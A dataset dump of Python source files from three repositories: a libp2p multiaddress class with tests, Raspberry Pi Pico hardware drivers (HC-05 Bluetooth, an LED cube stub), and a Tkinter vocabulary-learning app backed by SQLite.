"text": "class MultiAddr:\n\n # Validates input string and constructs internal representation.\n def __init__(self, addr):\n self.protocol_map = dict()\n\n # Empty multiaddrs are valid.\n if not addr:\n self.protocol_map = dict()\n return\n\n if not addr[0] == \"/\":\n raise MultiAddrValueError(\"Invalid input multiaddr.\")\n\n addr = addr[1:]\n protocol_map = dict()\n split_addr = addr.split(\"/\")\n\n if not split_addr or len(split_addr) % 2 != 0:\n raise MultiAddrValueError(\"Invalid input multiaddr.\")\n\n is_protocol = True\n curr_protocol = \"\"\n\n for addr_part in split_addr:\n if is_protocol:\n curr_protocol = addr_part\n else:\n protocol_map[curr_protocol] = addr_part\n is_protocol = not is_protocol\n\n # Basic validation of protocols\n # TODO(rzajac): Add more validation as necessary.\n if 'ip4' in self.protocol_map and 'ip6' in self.protocol_map:\n raise MultiAddrValueError(\"Multiaddr should not specify two IP layers.\")\n\n if 'tcp' in self.protocol_map and 'udp' in self.protocol_map:\n raise MultiAddrValueError(\"Multiaddr should not specify two transport layers.\")\n\n self.protocol_map = protocol_map\n\n def get_protocols(self):\n \"\"\"\n :return: List of protocols contained in this multiaddr.\n \"\"\"\n return list(self.protocol_map.keys())\n\n def get_protocol_value(self, protocol):\n \"\"\"\n Getter for protocol values in this multiaddr.\n :param protocol: the protocol whose value to retrieve\n :return: value of input protocol\n \"\"\"\n if protocol not in self.protocol_map:\n return None\n\n return self.protocol_map[protocol]\n\n def add_protocol(self, protocol, value):\n \"\"\"\n Setter for protocol values in this multiaddr.\n :param protocol: the protocol whose value to set or add\n :param value: the value for the input protocol\n :return: True if successful\n \"\"\"\n self.protocol_map[protocol] = value\n return True\n\n def remove_protocol(self, protocol):\n \"\"\"\n Remove protocol and its value from this multiaddr.\n :param protocol: the protocol to remove\n :return: True if remove succeeded, False if protocol was not contained in this multiaddr\n \"\"\"\n del self.protocol_map[protocol]\n\n def get_multiaddr_string(self):\n \"\"\"\n :return: the string representation of this multiaddr.\n \"\"\"\n addr = \"\"\n\n for protocol in self.protocol_map:\n addr += \"/\" + protocol + \"/\" + self.get_protocol_value(protocol)\n\n return addr\n\n def to_options(self):\n \"\"\"\n Gives back a dictionary with access to transport information from this multiaddr.\n Example: MultiAddr('/ip4/127.0.0.1/tcp/4001').to_options()\n = { family: 'ipv4', host: '127.0.0.1', transport: 'tcp', port: '4001' }\n :return: {{family: String, host: String, transport: String, port: String}}\n with None if field does not exist\n \"\"\"\n options = dict()\n\n if 'ip4' in self.protocol_map:\n options['family'] = 'ipv4'\n options['host'] = self.protocol_map['ip4']\n elif 'ip6' in self.protocol_map:\n options['family'] = 'ipv6'\n options['host'] = self.protocol_map['ip6']\n else:\n options['family'] = None\n options['host'] = None\n\n if 'tcp' in self.protocol_map:\n options['transport'] = 'tcp'\n options['port'] = self.protocol_map['tcp']\n elif 'udp' in self.protocol_map:\n options['transport'] = 'udp'\n options['port'] = self.protocol_map['udp']\n else:\n options['transport'] = None\n options['port'] = None\n\n return options\n\n\nclass MultiAddrValueError(ValueError):\n \"\"\"Raised when the input string to the MultiAddr constructor was invalid.\"\"\"\n"
},
{
"alpha_fraction": 0.5947712659835815,
"alphanum_fraction": 0.6181139349937439,
"avg_line_length": 33.772727966308594,
"blob_id": "8a3e31d42cd964cd58bd3a0a2bd43407389d7fa9",
"content_id": "9d4e0a9e01584c11549551d9fc1c9903b2c6c27d",
"detected_licenses": [
"Apache-2.0",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5355,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 154,
"path": "/tests/libp2p/test_libp2p.py",
"repo_name": "Jorropo/py-libp2p",
"src_encoding": "UTF-8",
"text": "import multiaddr\nimport pytest\n\nfrom libp2p import new_node\nfrom libp2p.peer.peerinfo import info_from_p2p_addr\n\n\[email protected]\nasync def test_simple_messages():\n node_a = await new_node(transport_opt=[\"/ip4/127.0.0.1/tcp/0\"])\n node_b = await new_node(transport_opt=[\"/ip4/127.0.0.1/tcp/0\"])\n\n async def stream_handler(stream):\n while True:\n read_string = (await stream.read()).decode()\n print(\"host B received:\" + read_string)\n\n response = \"ack:\" + read_string\n print(\"sending response:\" + response)\n await stream.write(response.encode())\n\n node_b.set_stream_handler(\"/echo/1.0.0\", stream_handler)\n\n # Associate the peer with local ip address (see default parameters of Libp2p())\n node_a.get_peerstore().add_addrs(node_b.get_id(), node_b.get_addrs(), 10)\n\n stream = await node_a.new_stream(node_b.get_id(), [\"/echo/1.0.0\"])\n\n messages = [\"hello\" + str(x) for x in range(10)]\n for message in messages:\n await stream.write(message.encode())\n\n response = (await stream.read()).decode()\n\n print(\"res: \" + response)\n assert response == (\"ack:\" + message)\n\n # Success, terminate pending tasks.\n return\n\n\[email protected]\nasync def test_double_response():\n node_a = await new_node(transport_opt=[\"/ip4/127.0.0.1/tcp/0\"])\n node_b = await new_node(transport_opt=[\"/ip4/127.0.0.1/tcp/0\"])\n\n async def stream_handler(stream):\n while True:\n read_string = (await stream.read()).decode()\n print(\"host B received:\" + read_string)\n\n response = \"ack1:\" + read_string\n print(\"sending response:\" + response)\n await stream.write(response.encode())\n\n response = \"ack2:\" + read_string\n print(\"sending response:\" + response)\n await stream.write(response.encode())\n\n node_b.set_stream_handler(\"/echo/1.0.0\", stream_handler)\n\n # Associate the peer with local ip address (see default parameters of Libp2p())\n node_a.get_peerstore().add_addrs(node_b.get_id(), node_b.get_addrs(), 10)\n print(\"node_a about to open stream\")\n stream = await node_a.new_stream(node_b.get_id(), [\"/echo/1.0.0\"])\n messages = [\"hello\" + str(x) for x in range(10)]\n for message in messages:\n await stream.write(message.encode())\n\n response1 = (await stream.read()).decode()\n\n print(\"res1: \" + response1)\n assert response1 == (\"ack1:\" + message)\n\n response2 = (await stream.read()).decode()\n\n print(\"res2: \" + response2)\n assert response2 == (\"ack2:\" + message)\n\n # Success, terminate pending tasks.\n return\n\n\[email protected]\nasync def test_multiple_streams():\n # Node A should be able to open a stream with node B and then vice versa.\n # Stream IDs should be generated uniquely so that the stream state is not overwritten\n node_a = await new_node(transport_opt=[\"/ip4/127.0.0.1/tcp/0\"])\n node_b = await new_node(transport_opt=[\"/ip4/127.0.0.1/tcp/0\"])\n\n async def stream_handler_a(stream):\n while True:\n read_string = (await stream.read()).decode()\n\n response = \"ack_a:\" + read_string\n await stream.write(response.encode())\n\n async def stream_handler_b(stream):\n while True:\n read_string = (await stream.read()).decode()\n\n response = \"ack_b:\" + read_string\n await stream.write(response.encode())\n\n node_a.set_stream_handler(\"/echo_a/1.0.0\", stream_handler_a)\n node_b.set_stream_handler(\"/echo_b/1.0.0\", stream_handler_b)\n\n # Associate the peer with local ip address (see default parameters of Libp2p())\n node_a.get_peerstore().add_addrs(node_b.get_id(), node_b.get_addrs(), 10)\n node_b.get_peerstore().add_addrs(node_a.get_id(), node_a.get_addrs(), 10)\n\n stream_a = await node_a.new_stream(node_b.get_id(), [\"/echo_b/1.0.0\"])\n stream_b = await node_b.new_stream(node_a.get_id(), [\"/echo_a/1.0.0\"])\n\n # A writes to /echo_b via stream_a, and B writes to /echo_a via stream_b\n messages = [\"hello\" + str(x) for x in range(10)]\n for message in messages:\n a_message = message + \"_a\"\n b_message = message + \"_b\"\n\n await stream_a.write(a_message.encode())\n await stream_b.write(b_message.encode())\n\n response_a = (await stream_a.read()).decode()\n response_b = (await stream_b.read()).decode()\n\n assert response_a == (\"ack_b:\" + a_message) and response_b == (\"ack_a:\" + b_message)\n\n # Success, terminate pending tasks.\n return\n\n\[email protected]\nasync def test_host_connect():\n node_a = await new_node(transport_opt=[\"/ip4/127.0.0.1/tcp/0\"])\n node_b = await new_node(transport_opt=[\"/ip4/127.0.0.1/tcp/0\"])\n\n assert not node_a.get_peerstore().peers()\n\n addr = node_b.get_addrs()[0]\n info = info_from_p2p_addr(addr)\n await node_a.connect(info)\n\n assert len(node_a.get_peerstore().peers()) == 1\n\n await node_a.connect(info)\n\n # make sure we don't do double connection\n assert len(node_a.get_peerstore().peers()) == 1\n\n assert node_b.get_id() in node_a.get_peerstore().peers()\n ma_node_b = multiaddr.Multiaddr('/p2p/%s' % node_b.get_id().pretty())\n for addr in node_a.get_peerstore().addrs(node_b.get_id()):\n assert addr.encapsulate(ma_node_b) in node_b.get_addrs()\n"
},
{
"alpha_fraction": 0.7735849022865295,
"alphanum_fraction": 0.8113207817077637,
"avg_line_length": 9.600000381469727,
"blob_id": "e554848adc05d82b1b8a1bd24af365f1acbedb94",
"content_id": "9dd125676566a24b75c8fc941ef2e1bb3c7081cb",
"detected_licenses": [
"Apache-2.0",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 14,
"num_lines": 5,
"path": "/requirements_dev.txt",
"repo_name": "Jorropo/py-libp2p",
"src_encoding": "UTF-8",
"text": "pytest>=3.6\ncodecov\npytest-cov\npytest-asyncio\npylint\n"
}
] | 3 |
thatGreenFrog/PicoPackages | https://github.com/thatGreenFrog/PicoPackages | 6bee3b9a58a3445a82f602deefa902a4c4fb28da | 6536fdbd2d8e683152d7c91a37f21793fba57a84 | 5550cefc585c6f0bf265563333d6f982c0df90c6 | refs/heads/main | 2023-08-30T01:10:35.371288 | 2021-10-17T15:21:35 | 2021-10-17T15:21:35 | 415,676,401 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6197916865348816,
"alphanum_fraction": 0.6215277910232544,
"avg_line_length": 29.36842155456543,
"blob_id": "65133555167a8813f1f19f749f54d3f06b2d4c67",
"content_id": "df21087adf6a21d980418e78e182e104b37f1343",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 576,
"license_type": "permissive",
"max_line_length": 175,
"num_lines": 19,
"path": "/led_cube.py",
"repo_name": "thatGreenFrog/PicoPackages",
"src_encoding": "UTF-8",
"text": "from machine import Pin\nimport utime\n\n\nclass LedCube:\n\n def __init__(self, level_pins, led_pins):\n if not len(level_pins) % len(led_pins) == 0:\n raise CubeException(\"led_pins array length does not divide with level_pins array length. len(level_pins) = \", len(level_pins), \", len(led_pins) = \", len(led_pins))\n self.level_pins = map(lambda p: Pin(p, Pin.OUT), level_pins)\n self.led_pins = map(lambda p: Pin(p, Pin.OUT), led_pins)\n\n \n \n \n\nclass CubeException(Exception):\n def __init__(self, message):\n self.message = message"
},
{
"alpha_fraction": 0.7834850549697876,
"alphanum_fraction": 0.7958387732505798,
"avg_line_length": 101.5999984741211,
"blob_id": "ede319f9b99af0bbd1d768c01628613fa5c25132",
"content_id": "642e28acb244da2fe7d1962daae7f8031dccbeda",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1538,
"license_type": "permissive",
"max_line_length": 351,
"num_lines": 15,
"path": "/README.md",
"repo_name": "thatGreenFrog/PicoPackages",
"src_encoding": "UTF-8",
"text": "# PicoPackages\n## Intro\nThis repository contains different packages, drivers and modules for Raspberry Pi Pico written in MicroPython\n\n## bluetooth.py\n### HC05\nHC05 is simple driver for HC-05 bluetooth module that implements simplified data reads and writes to module.\n#### Constructor parameters\n- state_pin_num - state pi number of HC-05 module. Used to check if connection has been established to another BT device. DEFAULT: None\n- CHECK_CONNECTION - boolean parameter. If set to false driver will not check connection prior to writing or reading data regardless if state_pin_num has been passed. If state_pin_num is not passed then CHECK_CONNECTION will be set to False. DEFAULT: True\n- BAUDRATE - currently not in use. DEFAULT: 9600\n#### Available methods\n- read_data(READ_TIMEOUT = 60) - Will block current thread until any data is read from buffer or READ_TIMEOUT is exceeded. If state_pin is initialized and CHECK_CONNECTION set to True method will wait until connection is established.\n- send_data() - Will write data to HC-05 module buffer to be sent to paired device. If state_pin initialized and CHECK_CONNECTION set to True method will wait until connection is established.\n- wait_for_connection(WAIT_CONNECTION_TIMEOUT = 60) - Will block current thread until connection is established with another BT device (state_pin.value() == 1). Raises ConnectionTimeoutException if WAIT_CONNECTION_TIMEOUT is exceeded. Unblocks thread if connection is established. Raise StatePinNotInitializedException if state_pin is not initialized."
},
{
"alpha_fraction": 0.6234939694404602,
"alphanum_fraction": 0.6355421543121338,
"avg_line_length": 38.05882263183594,
"blob_id": "5dec287813aa620ad79331a6ce533f7b9571d383",
"content_id": "bea9ee6ad3bf27c3acfee1f15e5fb652ea2e9252",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3320,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 85,
"path": "/bluetooth.py",
"repo_name": "thatGreenFrog/PicoPackages",
"src_encoding": "UTF-8",
"text": "from machine import Pin,UART\nimport utime\n\n\nclass HC05:\n \n uart = None\n state_pin = None\n CHECK_CONNECTION = None\n \n def __init__(self, state_pin_num = None, CHECK_CONNECTION = True, BAUDRATE = 9600):\n self.CHECK_CONNECTION = CHECK_CONNECTION and state_pin_num is not None\n self.uart = UART(0, BAUDRATE)\n if state_pin_num is not None:\n self.state_pin = Pin(state_pin_num, Pin.IN)\n\n\n # Actual method to read data from buffer\n def _read_data(self):\n if self.CHECK_CONNECTION:\n # If state_pin is initialized and CHECK_CONNECTION passed to constructor as True \n # method will wait until connection is estableshed to another BT device\n self.wait_for_connection()\n data = None\n if self.uart.any():\n data = b\"\"\n read = self.uart.read()\n if not read == None:\n data = b\"\".join([data, read])\n return data.decode('utf-8') if data is not None else None\n\n\n # Read data from buffer. If READ_TIMEOUT > 0 method will block thread until data is received or timeout exceeded\n def read_data(self, READ_TIMEOUT = 60):\n data = None\n start_time = utime.ticks_ms()\n while True:\n data = self.read_data()\n if READ_TIMEOUT == 0 or len(data) > 0:\n # If any data has been read from buffer then we return this data immidiately\n # or if READ_TIMEOUT has been set to 0, then method assumes that the user \n # doesn't want to block the thread and returns data regardless if anything has been read from buffer\n return data\n elif utime.ticks_ms() - start_time > READ_TIMEOUT * 1000:\n # If READ_TIMEOUT > 0, then we raise ReadTimeoutException (if the timeout has been exceede)\n # so that user can handle this gracefully\n raise ReadTimeoutException()\n \n # Write data to buffer.\n def send_data(self, data):\n if self.CHECK_CONNECTION:\n # If state_pin is initialized and CHECK_CONNECTION passed to constructor as True \n # method will wait until connection is estableshed to another BT device\n self.wait_for_connection()\n self.uart.write(str(data))\n\n\n # When HC-05 modukle state pin returns value 1 it means that connection has been established to another BT device\n # This method will block current thread until state pin returns value 1 or WAIT_CONNECTION_TIMEOUT timeout is exceeded \n def wait_for_connection(self, WAIT_CONNECTION_TIMEOUT = 60):\n if self.state_pin == None:\n # If state pin is not initialized then we cannot check connection\n # for this reason exception is raised, so that user can handle gracefully\n raise StatePinNotInitializedException()\n start_time = utime.ticks_ms()\n while not self.state_pin.value() == 1:\n if utime.ticks_ms() - start_time > WAIT_CONNECTION_TIMEOUT * 1000:\n raise ConnectionTimeoutException()\n utime.sleep(0.1)\n\n\nclass HC05Exception(Exception):\n pass\n\n\nclass ReadTimeoutException(HC05Exception):\n pass\n\n\nclass ConnectionTimeoutException(HC05Exception):\n pass\n\n\nclass StatePinNotInitializedException(HC05Exception):\n pass\n"
}
] | 3 |
aledruetta/vocapy | https://github.com/aledruetta/vocapy | e9919d6969ef9bc3c55803f926878b06adff03ba | 9d471b1855f7baf22fbe366e0329e8a2570bbaa2 | ac436be743dc70081d0a28e16b4b02edd5a5e02d | refs/heads/master | 2021-01-22T20:45:29.193905 | 2015-11-13T20:18:06 | 2015-11-18T14:37:22 | 27,052,552 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5328099727630615,
"alphanum_fraction": 0.5382447838783264,
"avg_line_length": 29.292682647705078,
"blob_id": "1380af9b9baffe64c1d0507dffa9ca9e1a8fe384",
"content_id": "4433c39fee9365133317d41778df2296555df0e3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9951,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 328,
"path": "/classes.py",
"repo_name": "aledruetta/vocapy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Script Name: classes.py\n# Author: Alejandro Druetta\n# Version: 0.4\n#\n# Description: Aplicación para el aprendizaje de vocabulario de\n# lenguas extranjeras.\n\nimport time\nimport subprocess\nimport random\nfrom operator import itemgetter\nimport sqlite3 as sql\n\nDATABASE = 'database.db'\n_PRAGMA = \"PRAGMA foreign_keys = ON\"\nDEBUG = True\nMAXVIEW = 20\n\n\nclass VocapyWord:\n \"\"\"Objeto que representa cada palabra de la lengua aprendida\"\"\"\n\n def __init__(self, name, last_time, attempts, guess, means):\n self.name = name\n self.last_time = last_time\n self.attempts = attempts\n self.guess = guess\n self.means = means\n\n @property\n def percent(self):\n \"\"\"Porcentaje de aciertos en relación a la cantidad de intentos\"\"\"\n\n try:\n return int(self.guess * 100 / self.attempts)\n except ZeroDivisionError:\n return 0\n except TypeError:\n return 0\n\n def rand_mean(self):\n \"\"\"Uno de los significados de la palabra al azar\"\"\"\n\n return random.choice(self.means)\n\n def update_db(self):\n \"\"\"Actualiza los datos en DB del objeto VocapyWord\"\"\"\n\n self.last_time = time.time() # Actualiza el tiempo\n conn = sql.connect(DATABASE) # de visualización\n with conn:\n cur = conn.cursor()\n cur.execute(_PRAGMA)\n cur.execute(\"UPDATE words SET last_time=?, attempts=?, guess=? \\\n WHERE word_ID=?\", (\n self.last_time,\n self.attempts,\n self.guess,\n self.name\n )\n )\n conn.commit()\n\n def __repr__(self):\n return \"{}: {}, {}, {}, {}\".format(\n self.name,\n self.last_time,\n self.attempts,\n self.guess,\n self.means\n )\n\n\nclass WordList(list):\n \"\"\"Lista de objetos VocapyWord\"\"\"\n\n def __init__(self):\n self.db_load()\n self.length = len(self)\n\n def db_load(self):\n \"\"\"Construye WordList a partir de los datos en DB\"\"\"\n\n conn = sql.connect(DATABASE)\n with conn:\n cur = conn.cursor()\n word_list = cur.execute(\"SELECT * FROM words\").fetchall()\n for name, last_time, attempts, guess in word_list:\n means = cur.execute(\n \"SELECT mean_ID FROM means WHERE word_ID = ?\", (name,)\n ).fetchall()\n # fetchall devuelve una lista de tuplas de un\n # elemento (element,)\n means = [m[0] for m in means]\n self.append(\n VocapyWord(name, last_time, attempts, guess, means)\n )\n\n def append_db(self, word):\n \"\"\"Agrega un elemento a WordList y a DB\"\"\"\n\n conn = sql.connect(DATABASE)\n with conn:\n cur = conn.cursor()\n cur.execute(_PRAGMA)\n cur.execute(\"INSERT INTO words VALUES (?, ?, ?, ?)\",\n (word.name, word.last_time, word.attempts,\n word.guess))\n for mean in word.means:\n cur.execute(\"INSERT INTO means VALUES (?, ?)\",\n (word.name, mean))\n conn.commit()\n super().append(word)\n\n def remove_db(self, word):\n \"\"\"Remueve un elemento de WordList y de DB\"\"\"\n\n conn = sql.connect(DATABASE)\n with conn:\n cur = conn.cursor()\n cur.execute(_PRAGMA)\n cur.execute(\"DELETE FROM means WHERE word_ID=?\",\n (word.name,))\n cur.execute(\"DELETE FROM words WHERE word_ID=?\",\n (word.name,))\n conn.commit()\n super().remove(word)\n\n def clear(self):\n \"\"\"Limpia WordList y DB\"\"\"\n\n super().clear()\n subprocess.call(['rm', DATABASE])\n subprocess.check_output(\"cat schema.sql | sqlite3 {}\".format(DATABASE),\n shell=True)\n\n def sort_by_attr(self, attr):\n \"\"\"Ordena WordList por atributo de VocapyWord\"\"\"\n\n # Lista de tuplas con formato (palabra, atributo)\n word_attr = [(word, word.__getattribute__(attr)) for word in self]\n # itemgetter(1) permite ordenar por el segundo elemento de\n # cada tupla (atributo).\n word_attr.sort(key=itemgetter(1))\n\n return [word for word, attribute in word_attr]\n\n def oldest(self):\n \"\"\"El elemento que lleva más tiempo sin ser visualizado\"\"\"\n\n return self.sort_by_attr('last_time')[0]\n\n def worst(self):\n \"\"\"El elemento con peor porcentaje\"\"\"\n\n return self.sort_by_attr('percent')[0]\n\n def random(self):\n \"\"\"Un elemento aleatóreo\"\"\"\n\n return random.choice(self)\n\n\nclass PracticeRound:\n \"\"\"Objeto representando cada una de las rondas de juego\"\"\"\n\n def __init__(self, word_list):\n self._word_list = word_list # WordList instance\n self.word = self.select_word()\n self.target = self.word.rand_mean()\n self.means = self.select_choices()\n\n def select_word(self):\n \"\"\"Escoge un elemento entre tres criterios posibles:\n - El menos visualizado\n - El que tiene peor porcentaje\n - Un elemento aleatóreo\n \"\"\"\n\n wl = self._word_list\n foos = [wl.oldest, wl.worst, wl.random] # Function objects\n foo = random.choice(foos)\n\n if DEBUG:\n print(\"\\nselected: {}\".format(foo.__name__))\n\n return foo() # Call function\n\n def select_choices(self):\n \"\"\"Selecciona las opciones presentadas al jugador\"\"\"\n\n means_set = {self.target}\n while len(means_set) < 4:\n rand_word = self._word_list.random()\n fake = rand_word.rand_mean()\n if fake not in self.word.means:\n means_set.add(fake)\n choices_lst = list(means_set)\n random.shuffle(choices_lst)\n\n return choices_lst\n\n def __repr__(self):\n return \"\"\"\n {}\n [last_time: {}]\n [percent: {}]\n \"\"\".format(self.word.name, self.word.last_time, self.word.percent)\n\n\nclass Session:\n \"\"\"Lleva un historial de los resultados de cada sesión de juego.\n Una sesión es lo que sucede desde que se accede hasta que se cierra la\n aplicación.\n \"\"\"\n\n def __init__(self, last_time, attempts, guess):\n self.last_time = last_time\n self.attempts = attempts\n self.guess = guess\n\n @property\n def percent(self):\n \"\"\"Proporción de aciertos en relación a intentos\"\"\"\n\n try:\n return int(self.guess * 100 / self.attempts)\n except ZeroDivisionError:\n return 0\n except TypeError:\n return 0\n\n @staticmethod\n def sessions_lst():\n \"\"\"Retorna la lista de sesiones almacenadas en DB\"\"\"\n\n conn = sql.connect(DATABASE)\n with conn:\n cur = conn.cursor()\n fetch = cur.execute(\"SELECT * FROM sessions\").fetchall()\n fetch.sort(key=itemgetter(0), reverse=True)\n\n # Lista de objetos Session\n return [Session(lt, a, g) for lt, a, g in fetch]\n\n def append_db(self):\n \"\"\"Almacena la sesión actual a DB\"\"\"\n\n if self.attempts:\n conn = sql.connect(DATABASE)\n with conn:\n cur = conn.cursor()\n cur.execute(_PRAGMA)\n cur.execute(\"INSERT INTO sessions VALUES (?, ?, ?)\", (\n self.last_time, self.attempts, self.guess))\n conn.commit()\n\n def __repr__(self):\n return \"({}, {}, {})\".format(self.last_time, self.attempts, self.guess)\n\n\nclass PercentBar:\n \"\"\"Barra de porcentaje de aciertos en relación a intentos en la parte\n inferior de la ventana principal.\n \"\"\"\n\n def __init__(self, text, start, lenght, char, percent, colors):\n self.text = text # Object tk.Text\n self.start = start # Coords Tuple, ex: (1, 0)\n self.lenght = lenght\n self.char = char\n self.percent = percent\n self.colors = colors # Colors Tuple, ex: ('green', 'red')\n\n def create(self):\n self.text.tag_configure('segment1', background=self.colors[0])\n self.text.tag_configure('segment2', background=self.colors[1])\n\n segment1 = round(self.percent * self.lenght / 100) * self.char\n segment2 = (self.lenght - len(segment1)) * self.char\n\n row = self.start[0]\n column = self.start[1]\n forward = column + len(segment1)\n\n seg1_start = '{}.{}'.format(row, column)\n seg1_end = '{}.{}'.format(row, forward)\n\n seg2_start = '{}.{}'.format(row, forward)\n seg2_end = '{}.{}'.format(row, forward + len(segment2))\n\n self.text.insert(seg1_start, segment1 + segment2)\n self.text.tag_add('segment1', seg1_start, seg1_end)\n self.text.tag_add('segment2', seg2_start, seg2_end)\n\n\nclass ConfDict(dict):\n\n def load(self):\n \"\"\"Carga los datos de configuración en DB, en forma de diccionario\"\"\"\n\n conn = sql.connect(DATABASE)\n with conn:\n cur = conn.cursor()\n fetch = cur.execute(\"SELECT conf_ID, value FROM configs\").fetchall()\n for key, value in fetch:\n self[key] = value\n if DEBUG:\n print('\\nconfigs: \\n{}'.format(self))\n\n def save(self, conf, value):\n \"\"\"Registra en DB las alteraciones de configuración\"\"\"\n\n conn = sql.connect(DATABASE)\n with conn:\n cur = conn.cursor()\n cur.execute(\"INSERT or REPLACE INTO configs (conf_ID, value) \\\n VALUES (?, ?)\", (conf, value))\n\n\ndef main():\n pass\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5165315270423889,
"alphanum_fraction": 0.5240174531936646,
"avg_line_length": 32.74736785888672,
"blob_id": "2f9b071b863a05e54981c7db052ebcd0cd42d5aa",
"content_id": "adb6973e97f68618bb257d60f5991c6b362307fa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3210,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 95,
"path": "/statistics.py",
"repo_name": "aledruetta/vocapy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Script Name: statistics.py\n# Author: Alejandro Druetta\n# Version: 0.4\n#\n# Description: Aplicación para el aprendizaje de vocabulario de\n# lenguas extranjeras.\n\nimport tkinter as tk\nfrom tkinter import messagebox\nfrom classes import Session\nfrom classes import MAXVIEW\n\n\nclass Stats:\n def __init__(self, master):\n self.sessions = Session.sessions_lst()\n if len(self.sessions) > MAXVIEW:\n # Show last MAXVIEW elements\n self.sessions = self.sessions[:MAXVIEW-1]\n # Greatest attempt's length\n attempts_lst = sorted([session.attempts for session in self.sessions])\n try:\n self.max_att = len(str(attempts_lst.pop()))\n except IndexError:\n # Messagebox\n title = _('Advertencia')\n message = _('\\nNo hay sesiones previas guardadas \\\n en la base de datos.')\n messagebox.showinfo(title, message, parent=master)\n else:\n self.window = tk.Toplevel(master)\n self.window.title(_('Estadísticas'))\n self.window.resizable(0, 0)\n self.window.bind('<Control-q>', self.destroyWin)\n\n self.bar_len = 20\n self.char = '✔'\n self.pad = 2\n info_len = self.bar_len + self.max_att + len(_('palabras')) \\\n + 10 + self.pad * 2\n\n self.textS = tk.Text(self.window)\n self.textS['font'] = 'mono 10'\n self.textS['relief'] = 'flat'\n self.textS['width'] = info_len\n self.textS['height'] = len(self.sessions) + 2\n self.textS.tag_configure('guess', foreground='green')\n self.textS.tag_configure('wrong', foreground='white')\n self.textS.pack(fill='x', expand='yes')\n self.textS.insert('1.0', '\\n')\n\n line = 2\n for session in self.sessions:\n self.percentbar(session, line)\n line += 1\n\n def percentbar(self, session, line):\n attempts = session.attempts\n percent = session.percent\n sep = int(self.bar_len * session.percent / 100)\n perc_str = str(percent).rjust(3) + '%'\n atte_str = str(attempts).rjust(self.max_att)\n\n template = '{}{} {} {} {} {}{}\\n'\n info = template.format(self.pad * ' ', self.char * self.bar_len,\n perc_str, _('de'), atte_str, _('palabras'),\n self.pad * ' ')\n\n self.textS['state'] = 'normal'\n\n self.textS.insert('{}.{}'.format(line, self.pad), info)\n # guess\n start = '{}.{}'.format(line, self.bar_len - sep + self.pad)\n end = '{}.{}'.format(line, self.bar_len + self.pad)\n self.textS.tag_add('guess', start, end)\n # wrong\n start = '{}.{}'.format(line, self.pad)\n end = '{}.{}'.format(line, self.bar_len - sep + self.pad)\n self.textS.tag_add('wrong', start, end)\n\n self.textS['state'] = 'disabled'\n\n def destroyWin(self, event=None):\n self.window.destroy()\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5339589715003967,
"alphanum_fraction": 0.5427071452140808,
"avg_line_length": 30.513784408569336,
"blob_id": "f570651abb8cc1f655aafd7b676938a4af99efd2",
"content_id": "7c2ff58cf6c1783dd19fcb391c342c9641a43092",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12588,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 399,
"path": "/vocapy.py",
"repo_name": "aledruetta/vocapy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Script Name: vocapy.py\n# Author: Alejandro Druetta\n# Version: 0.4\n#\n# Description: Aplicación para el aprendizaje de vocabulario de\n# lenguas extranjeras.\n\nimport time\nimport gettext\nimport locale\nimport tkinter as tk\nimport webbrowser\nfrom tkinter import messagebox\nfrom classes import WordList, PercentBar, Session, PracticeRound, ConfDict\nfrom classes import DEBUG\nfrom constructor import ConstList\nfrom statistics import Stats\n\n\nclass VocapyApp(tk.Tk):\n def __init__(self):\n super().__init__()\n\n # Window geometry\n self.title('VocaPy')\n self.resizable(0, 0)\n self.padding = 20\n\n # General settings\n self.version = '0.3'\n self.option_add('*font', 'helvetica 11')\n self.option_add('*Entry.font', 'helvetica 12')\n self.option_add('*Listbox.font', 'helvetica 12')\n self.option_add('*Menu.background', 'snow')\n self.option_add('*Text.background', 'snow')\n self.option_add('*Menu.relief', 'flat')\n self.option_add('*Text.relief', 'flat')\n\n # Shortcuts\n self.protocol(\"WM_DELETE_WINDOW\", self.destroyWin)\n self.bind('<Control-q>', self.destroyWin)\n self.bind('<Control-a>', self.constructorCall)\n self.bind('<Control-e>', self.statsCall)\n self.urlHelp = 'https://github.com/aledruetta/vocapy'\n self.bind_all('<F1>', lambda e: self.openUrl(self.urlHelp))\n\n # Configurations\n self.cf_dict = ConfDict()\n self.cf_dict.load()\n self.lang = self.cf_dict.setdefault('lang', locale.getlocale()[0])\n\n # Localization\n self.i18n()\n\n # Game\n self.minWords = 5\n self.session = Session(time.time(), attempts=0, guess=0)\n self.word_list = WordList()\n self.main_window()\n self.practice()\n\n def main_window(self):\n\n # Menu\n self.menuBar()\n\n # Background\n color = 'crimson'\n labelFrameApp = tk.LabelFrame(self)\n labelFrameApp['bg'] = color\n labelFrameApp.pack(fill='x', expand='yes')\n\n # Word label\n self.labelW = tk.Label(labelFrameApp)\n self.labelW['font'] = ('Arial Black', 36)\n self.labelW['bg'] = color\n self.labelW['fg'] = 'snow'\n self.labelW['text'] = 